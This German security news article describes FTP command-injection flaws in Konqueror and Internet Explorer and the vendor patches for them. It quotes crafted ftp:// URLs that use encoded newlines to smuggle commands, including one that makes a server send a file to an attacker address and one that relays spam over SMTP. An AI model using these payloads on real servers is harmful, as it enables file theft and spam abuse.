Weitere Fehler in FTP-Komponenten von Web-Browsern
In den FTP-Komponenten der Web-Browser Konqueror und Internet Explorer sind Schwachstellen enthalten, mit denen sich über präparierte FTP-URLs (FTP://) Befehle auf einem FTP-Server ausführen und sogar Mails verschicken lassen.
In den FTP-Komponenten der Web-Browser Konqueror und Internet Explorer sind Schwachstellen enthalten, mit denen sich über präparierte FTP-URLs (FTP://) Befehle auf einem FTP-Server ausführen lassen. Darüber hinaus ist es mit derartigen Links sogar möglich, Mails an SMTP-Server zu übergeben. Spammer könnten Web-Seiten so manipulieren, dass Besucher etwa beim Klick auf ein Bild eine Mail versenden.
Das Problem liegt in der fehlenden Filterung URL-kodierter Newline-Zeichen (%0a), sodass sich etwa FTP-Befehle in aufgebaute FTP-Sessions einschleusen lassen:
ftp://ftpuser:ftppass@server/directory%0aftp-befehl%0a
Im vorliegenden Beispiel ist noch eine Authentifizierung durch den Nutzer erforderlich. Laut Albert Galicia, Entdecker der Schwachstelle, lässt sich anschließend aber der Server mit beliebigen Kommandos steuern, sofern der Anwender auf einen Link klickt.
So veranlasst der Link
ftp://server/%0aPORT%20a,b,c,d,e,f%0aRETR%20/file
den FTP-Server, eine auf ihm gespeicherte Datei an den Angreifer mit der IP-Adresse a,b,c,d zu senden. Zudem wäre das Löschen von Dateien möglich.
Da die FTP-Kommunikation eine gewisse Ähnlichkeit mit SMTP aufweist, funktioniert das Versenden von Mails mit bestimmten Links ebenfalls.
ftp://foo%0d%0aHELO mail%0d%0aMAIL FROM%3a<>%0d%0aRCPT
TO%3a%0d%0aDATA%0d%0aSubject%3a
hacked%0d%0aTo%3a user%40server%0d%0a%0d%0ahacked
%0d%0a.%0d%0a:victim@domain:25
Die Fehler sind seit dem 5. Dezember (Konqueror) beziehungsweise dem 7. Dezember (Internet Explorer) bekannt. Das KDE-Team hat ein Advisory veröffentlicht, das auf Patches für die vom Konqueror verwendete FTP-Komponente FTP kioslave unter KDE 3.2.3 und 3.3.2 hinweist. Die Linux-Distributoren haben bereits aktualisierte KDE-Pakete herausgegeben.
Für den Internet Explorer ist noch kein Update verfügbar, in Windows XP mit Service Pack 2 ist der Fehler aber nicht mehr enthalten. XP-Anwender mit Service Pack 1 sollten alsbald Service Pack 2 installieren, da dort bereits ein große Zahl nun aufgedeckter Fehler beseitigt ist. Allerdings öffnet man damit Sicherheitslücken, die unter SP1 nicht vorhanden sind. Anwender von Windows 2000 und XP-Anwender die aus bestimmten Gründen SP2 nicht installieren können, sollten einen alternativen Browser in Betracht ziehen.
Siehe dazu auch: (dab)
- ftp kioslave command injection vom KDE-Team
- Internet Explorer FTP command injection von Albert Puigsech Galicia
- Konqueror FTP command injection von Albert Puigsech Galicia
- Browsers' FTP Client can be Used to Send Mail von Securiteam
